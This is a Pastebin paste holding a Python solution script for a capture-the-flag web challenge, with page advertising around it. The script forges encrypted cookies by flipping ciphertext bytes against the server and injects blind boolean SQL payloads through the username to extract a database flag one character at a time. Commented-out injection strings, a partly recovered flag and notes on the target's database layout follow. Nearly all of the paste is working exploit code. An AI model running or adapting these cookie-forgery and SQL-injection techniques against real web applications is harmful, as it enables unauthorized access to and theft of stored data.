Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from base64 import b64encode
- import string
- import re
- import requests
- url="http://cryptolol.challs.malice.fr"
- def xor(a, b):
- out = []
- for (b1,b2) in zip(a,b):
- out.append(b1^b2)
- return bytes(out)
- nickname_length=21 #48 pour le cookie?
- regex = r"the user(.*) has been"
- def select_subtitle(html_string):
- a = html_string.split('\n')
- b = [l for l in a if 'subtitle' in l]
- return '\n'.join(b)
- def send_cookie(raw_bytes, print_whole_page):
- #print("Sending %s" % raw_bytes)
- h = {
- "cookie": "USERNAME=%s" % b64encode(raw_bytes).decode()
- }
- r = requests.get(url, headers=h)
- if print_whole_page:
- #print(r.text)
- pass
- try:
- a = re.search(regex, r.text).group(1)[7:-5]
- #print(a)
- except AttributeError:
- #print("It either finished or crashed!")
- return r.text
- b = eval('"%s"' % a)
- c = bytes([ord(l) for l in b]).replace(b"<",b"<").replace(b">",b">").replace(b"'",b"'").replace(b""",b"\"").replace(b"&",b"&")
- #print(c)
- if print_whole_page:
- return r.text
- else:
- return(c)
- def send_username(string_to_send):
- # first we pad the string
- BLOCK_SIZE = 16
- string_length = len(string_to_send)
- padding_length = BLOCK_SIZE - (string_length % BLOCK_SIZE)
- string_padded = [ord(c) for c in (string_to_send + " " * padding_length)]
- cipher_text = [0]*(len(string_padded) + BLOCK_SIZE)
- number_of_pass = len(string_padded) // BLOCK_SIZE + 1
- for i in reversed(range(0, number_of_pass)):
- if i != 0:
- decripted = send_cookie(bytes(cipher_text), False)
- interesting_bits = decripted[(BLOCK_SIZE * (i-1)):(BLOCK_SIZE * i)]
- for j in range(BLOCK_SIZE):
- cipher_text[(i-1) * BLOCK_SIZE + j] = interesting_bits[j]^string_padded[(i-1) * BLOCK_SIZE + j]
- else:
- result = send_cookie(bytes(cipher_text), True)
- test = ("Error" not in result)
- if test:
- print(select_subtitle(result))
- return test
- out = ""
- for i in range(32):
- for c in range(128):
- if c == ',':
- continue
- print(out + str(c), end='\r')
- #test = send_username("groot' AND MID( (select column_name from information_schema.columns where table_name='profiles' and ordinal_position=5) FROM %s FOR 1)='%s';#"%(i+1, c))
- test = send_username("flag' AND ASCII(MID( flag FROM %s FOR 1))=%s #"%(i+1, c))
- if test:
- out += chr(c)
- break
- print(out+'\n')
- else:
- exit()
- print(out)
- #table_name FROM information_schema.tables
- #send_username("hackquaman' AND !='1';#")
- #send_username("flag")
- #ndh{l!st3n-to_me
- """
- Flag:flag
- Groot:groot:flag
- Phishing fairy:hackquaman
- Ninja:SURIMI
- T
- host: webmaster
- db:website
- table_name=profiles
- columns:
- username
- class
- websIte
- avatAr
- flag
- """
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement